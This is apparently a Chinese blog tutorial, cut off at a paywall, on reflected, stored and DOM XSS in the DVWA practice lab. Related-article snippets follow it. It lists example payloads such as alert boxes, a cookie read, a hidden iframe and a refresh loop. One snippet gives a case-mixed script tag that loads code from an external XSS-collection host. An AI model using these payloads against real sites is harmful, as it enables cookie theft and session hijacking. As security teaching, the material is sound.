基于DVWA实现XSS跨站脚本漏洞-反射型、存储型、DOM XSS

最新推荐文章于 2024-05-13 13:45:23 发布
最新推荐文章于 2024-05-13 13:45:23 发布
阅读量1.1k 收藏 6
点赞数
分类专栏: XSS跨站脚本漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44029504/article/details/105922275
版权
什么是XSS跨站脚本漏洞

XSS跨站脚本(Cross-Site Scripting,XSS)

XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,是因WEB应用程序对用户输入过滤不足而产生的,当用户浏览这些网页时,就会执行其中的恶意代码。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了WEB客户端的逻辑,在这个基础上,黑客可以轻易地发起Cookie窃取,会话劫持,钓鱼欺骗等各种各样的攻击。

通常情况下,我们既可以把XSS理解成一种WEB应用安全漏洞,也可以理解成一种攻击手段。

XSS漏洞的特点:用户的输入,会在页面上显示出来
1)编写一个动态网站页面–xss.php
在这里插入图片描述
2)使用浏览器登陆网站

  • 192.168.168.135/test/xss.php
    在这里插入图片描述
    3)因为提交方式为get方式,所以在中输入
  • http://192.168.168.135/test/xss.php?key=2
    输入key=2,网页也显示出输入的内容-------2
    在这里插入图片描述
    4)判断网站有没有xss漏洞
  • http://192.168.168.135/test/xss.php?key=
    即网页想要让你输入key,但是你却输入了攻击代码–而这个攻击代码是由浏览器执行的
    在这里插入图片描述
XSS攻击流程

在这里插入图片描述
1、正常服务器信息
2、服务器存储恶意代码
3、用户浏览网页
4、服务器将恶意代码返回给用户
5、客户端浏览执行恶意代码

常用恶意脚本形式

1、利用XSS弹警告框:

<script>alert('xss')</script>

2、获取cookie值:

<script>alert(docment.cookie)</script>

3、嵌入其他网站:

<iframe src=http://baidu.com width=0 height=0></iframe>

4、XSS输入也可能是HTML代码段,如使网页不停的刷新:

<meta http-equiv="refresh" content="0;">
XSS跨站脚本分类

1、反射型XSS
2、存储型XSS
3、DOM XSS 文档对象模型

反射型XSS

原理:
XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。

反射型XSS也被称为非持久性XSS,是现在最容易出现的一种XSS漏洞。当用户访问一个带有XSS代码的URL请求时,服务器端接收数据后处理,然后把带有XSS代码的数据发送到浏览器,浏览

最低0.47元/天 解锁文章
观观雎鸠
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反射存储,基于DOMXSS原理+DVWA详细解析
Nawkham的博客
08-16 2106
XSS跨站脚本XSS概述 XSS定义 XSS(Cross Site Scripting)–跨站脚本击。为了区别于CSS,缩写为XSS跨站脚本击是一种常见的Web安全漏洞,它主要是指击者可以在页面中插入恶意脚本代码,当受害者访问这些页面时,浏览器会解析并执行这些恶意代码,从而达到窃取用户身份、钓鱼、传播恶意代码和控制用户浏览器等行为。 XSS产生原因 由于Web程序对用户的输入过滤不足,导致用户输入的恶意HTML/JavaScript代码注入到网页中,混淆原有语义,产生新的恶意语义。在其他用户访
DVWA测试XSS跨站脚本击三种类
WINDY_PACE的博客
05-04 1743
测试XSS三种类危害最大的存储如何无声息钓鱼获取到用户信息
XSS漏洞反射存储dom
每天累计一滴水 十天后变成一大滴水 一百天后变成一杯水
08-08 413
一、概念 二、实验 XSS反射 get XSS反射 post 1) <script>alert(1)</script> 2) <sCRiPt sRC=//xsshs.cn/Qelk></sCrIpT> xss平台至少有伴儿概率拿不到任何东西,习惯就好,多试试 XSS存储 ...
跨站脚本XSS漏洞_跨站脚本漏洞
最新发布
jennycisp的博客
05-13 1176
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类:1.反射XSS;2.存储XSS;3.DOMXSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼击、前端js挖矿、用户cookie获取。
DVWAxss
giun的博客
03-11 986
一、反射(reflected) (一)、尝试low等级 输入正常数字,返回以下内容 再输入&amp;lt;xss&amp;gt;发现,只输出了hello 我们使用火狐的开发者工具查看下元素 发现hello的后面是一对xss标签 我们进行弹窗测试 输入&amp;lt;script&amp;gt;alert(/xss/)&amp;lt;/script&amp;gt; 发现弹窗,说明存在xss注入 介绍javaScript的3个弹
DVWAXSS
weixin_34284188的博客
05-03 71
2019独角兽企业重金招聘Python工程师标准>>> ...
第一节 XSS跨站脚本分类-01
09-15
XSS 跨站脚本击是一种常见的 Web 应用程序安全漏洞击者可以通过在 Web 页面中插入恶意 Script 代码来击用户。为了防止 XSS 击,需要了解 XSS 的分类和特点。 XSS 漏洞介绍 XSS 跨站脚本击(Cross Site...
web安全技术-实验七、跨站脚本击(xss)(反射).doc
08-20
XSS分为三种类反射XSS存储XSSDOMXSS。 【反射XSS】 本次实验主要关注的是反射XSS,这种类击通常发生在用户点击一个包含恶意代码的链接或者输入带有恶意脚本的URL时。恶意代码不会被存储在...
跨站击(XSS+CSRF).docx
01-05
2. 存储XSS:这种击更为危险,因为恶意脚本存储在服务器上,然后在多个用户访问同一页面时执行。比如,击者在论坛发帖或评论中插入脚本,当其他用户查看时,脚本被执行。 3. DOMXSS:此类XSS发生在客户端...
网络安全原理与应用:反射XSS击演示.pptx
05-16
反射XSS(Cross-site scripting)击是一种常见的Web应用程序安全问题,主要利用用户输入的数据未经充分验证或过滤,直接在浏览器中执行,从而对用户的浏览器发起击。这种击模式的关键在于,恶意脚本不会被...
DVWA-master.zip
01-04
DVWA中的XSS练习涵盖了反射存储两种类,让你了解如何防范这种击,比如使用输入验证、转义特殊字符以及设置HTTP-only cookie等。 4. **命令注入** 在DVWA中,命令注入漏洞允许击者执行服务器上的任意...
DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示
热门推荐
weixin_46709219的博客
01-25 1万+
一)XSS(Reflected)介绍: 反射xss(非持久):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。 通过Web站点漏洞,向客户交付恶意脚本代码,实现对客户端的击;恶意击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意击用户的目的;注入客户端脚本代码、盗取cookie、重定向等。 二)实际
(25)【XSS跨站合集】反射存储DOMXSS原理;输出在HTML、CSS、Javascript代码中
03-24 4081
XSS跨站合集】反射存储DOMXSS
DVWA靶场XSS反射性和存储漏洞测试(low~high)
weixin_51585429的博客
11-07 2104
DVWA靶场XSS反射存储漏洞模块low~high等级
DVWA靶场-XSSDOM反射存储
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-09 1788
DOM XSS DOMXSS LOW DOM XSS 核心代码: Medium DOM XSS 核心代码: 绕过方法: High DOM XSS 核心代码: 绕过方式 Impossible DOM XSS 核心代码: Reflected XSS 反射XSS Low Reflected XSS 核心代码 Medium Reflected XSS 核心代码 绕过方法 High Reflected XSS 核心代码 Impossible Reflected XSS
dvwaxss(部分内容转自大佬)
crowsec
05-02 489
XSSXSS,全称Cross Site Scripting,即跨站脚本击,某种意义上也是一种注入击,是指击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS反射XSSDOMXSS由于其特殊性,常常被分为第三种...
DVWA靶场的XSS详解
Reset
05-11 836
目录 反射 low medium high impossible 存储 low medium high impossible DOM low medium high impossible 反射 low 服务器代码: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET..
DVWA】-反射/存储XSS
share something here
03-26 483
【Python】 DVWA介绍反射存储XSSDom XSSPythonI春期课程 介绍 XSS,全称 cross Site scripting,即跨站脚本击,某种意义上也是一种注入击,是指击者在页而中注入恶意的脚本代码。当受害者访问该页而时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限子 Javascript,还括flash等其它脚本语言。根据恶意代码是否存在服务器中,XSS可以分为存储XSS反射XSS. DOMXSS由于其特殊性,常常被分为第三种,这是一种基于DO
DVWA-xss详细讲解
qq_43395215的博客
05-08 1290
XSS,全称跨站脚本,即跨站脚本击,某种意义上也是一种注入击,是指击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要修改的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS反射XSS。 博客地址:http://soliym.top/ XSS分类: 反射xss:只是简...
dvwa xss反射
08-29
对于DVWA(Damn Vulnerable Web Application)的XSS反射击,它是一种常见的Web应用程序安全漏洞。在XSS跨站脚本击)反射击中,恶意用户通过构造特定的URL参数或表单输入,注入恶意脚本代码到应用程序的响应中,然后通过诱使受害者点击恶意链接或访问恶意网页来触发这些恶意脚本,从而窃取用户的敏感信息或执行其他恶意操作。 在DVWA中,你可以使用XSS反射漏洞进行实验和学习,以了解原理和防御措施。你可以通过创建一个包含恶意脚本代码的URL,然后将该URL发送给受害者或诱使受害者访问该URL,从而触发XSS反射漏洞。 注意,DVWA是一个有意设计成易受击的Web应用程序,目的是让开发人员和安全研究人员学习和实验各种Web应用程序安全漏洞。在实际应用程序中,你需要采取适当的防御措施来防止XSS击,例如输入验证、输出编码和内容安全策略(CSP)等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值